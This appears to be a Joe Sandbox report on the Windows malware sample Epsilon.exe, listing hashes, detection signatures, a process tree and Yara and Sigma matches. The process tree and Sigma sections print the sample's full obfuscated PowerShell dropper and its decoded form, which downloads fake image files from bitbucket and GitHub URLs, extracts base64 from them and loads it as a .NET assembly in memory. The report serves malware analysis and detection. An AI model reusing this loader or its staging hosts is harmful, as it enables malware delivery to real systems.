Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Epsilon.exe

Overview

General Information

Sample name:Epsilon.exe
Analysis ID:1582590
MD5:61566aa90d2dcaf483fe4697031f46c4
SHA1:b072393ac533c868683a93aa98e350144a772c34
SHA256:51826c6098770542d808375156b42c288ba675863a73eca9084c402a11771b2d
Tags:exeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Epsilon.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Epsilon.exe" MD5: 61566AA90D2DCAF483FE4697031F46C4)
    • cmd.exe (PID: 7344 cmdline: cmd.exe /c 677174b841ee7.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7416 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBo$GM$awBT$Gs$c$Bv$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBy$Hc$cQBl$Hc$cQBm$HE$dwBm$C8$cQBy$GU$d$By$GU$d$By$C8$ZwBy$G8$LgB0$GU$awBj$HU$YgB0$Gk$Yg$n$Cw$I$$n$D$$Jw$s$C$$JwBT$HQ$YQBy$HQ$dQBw$E4$YQBt$GU$Jw$s$C$$JwBN$HM$YgB1$Gk$b$Bk$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7504JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7504INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x6d376:$b2: ::FromBase64String(
    • 0xef2ac:$b2: ::FromBase64String(
    • 0x6d149:$b3: ::UTF8.GetString(
    • 0xef07f:$b3: ::UTF8.GetString(
    • 0xd54ff:$s1: -join
    • 0x12ecb3:$s1: -join
    • 0x2e829:$s3: reverse
    • 0x3547e:$s3: reverse
    • 0x37465:$s3: reverse
    • 0x42494:$s3: reverse
    • 0x89eba:$s3: reverse
    • 0x93d81:$s3: reverse
    • 0xbc5ae:$s3: reverse
    • 0xbc89c:$s3: reverse
    • 0xbcfb6:$s3: reverse
    • 0xbd76f:$s3: reverse
    • 0xc485a:$s3: reverse
    • 0xc4c74:$s3: reverse
    • 0xc57fc:$s3: reverse
    • 0xc64a9:$s3: reverse
    • 0x10aa67:$s3: reverse
    Process Memory Space: powershell.exe PID: 7660JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7660INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xcb83:$b2: ::FromBase64String(
      • 0xe0f0:$b2: ::FromBase64String(
      • 0x2204a:$b2: ::FromBase64String(
      • 0x23f98:$b2: ::FromBase64String(
      • 0x29273:$b2: ::FromBase64String(
      • 0x3edcc:$b2: ::FromBase64String(
      • 0xc956:$b3: ::UTF8.GetString(
      • 0xdec3:$b3: ::UTF8.GetString(
      • 0x21e1d:$b3: ::UTF8.GetString(
      • 0x23d6b:$b3: ::UTF8.GetString(
      • 0x29046:$b3: ::UTF8.GetString(
      • 0x3eb9f:$b3: ::UTF8.GetString(
      • 0x35763:$s1: -join
      • 0x37979:$s1: -join
      • 0x57ffc:$s1: -join
      • 0x1465:$s3: Reverse
      • 0x2343:$s3: Reverse
      • 0xca78:$s4: +=
      • 0xdfe5:$s4: +=
      • 0x21f3f:$s4: +=
      • 0x23e8d:$s4: +=

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7660.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); 